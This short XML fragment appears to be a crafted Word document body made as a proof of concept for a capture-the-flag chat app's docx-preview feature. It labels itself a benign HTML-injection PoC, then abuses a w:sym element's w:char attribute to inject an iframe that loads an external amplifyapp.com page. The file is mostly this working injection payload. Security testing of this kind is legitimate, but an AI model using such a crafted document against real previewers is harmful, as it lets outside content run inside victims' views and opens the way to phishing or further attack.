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>
  <w:body>
    <w:p><w:r><w:t xml:space="preserve"> VERITAS CTF chatapp docx-preview HTML-injection PoC (benign). The symbol run below injects a marker &lt;img&gt; via w:sym/@w:char.</w:t></w:r></w:p>
    <w:p><w:r><w:sym w:font="Symbol" w:char="0;&lt;iframe src="https://main.d4zeeqgazhley.amplifyapp.com/" width="100%" height="500"&gt;&lt;/iframe&gt;"/></w:r></w:p>
    <w:sectPr/>
  </w:body>
</w:document>
</file>